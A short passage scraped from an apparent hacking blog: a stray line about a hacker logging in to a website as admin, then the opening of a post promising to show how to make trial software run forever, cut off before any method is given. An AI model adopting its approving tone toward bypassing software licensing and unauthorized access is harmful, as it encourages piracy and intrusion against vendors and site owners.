Thus after successful login into the website as admin the hacker can do whatever he wants.

Hack Software and Run the Trial Program Forever

0 comments
In this post I’ll show you how to hack a Software and run the trial program forever. Most of us are familiar with many softwares that run only for a specified period of time in the trial mode. Once the trial period is expired these softwares stop functioning and demand for a purchase. But there is a way to run the softwares and make them function beyond the trial period. Isn’t this interesting?

Before I tell you how to hack the software and make it run in the trial mode forever, we have to understand the functioning of these softwares. I’ll try to explain this in brief.

UA-35960349-1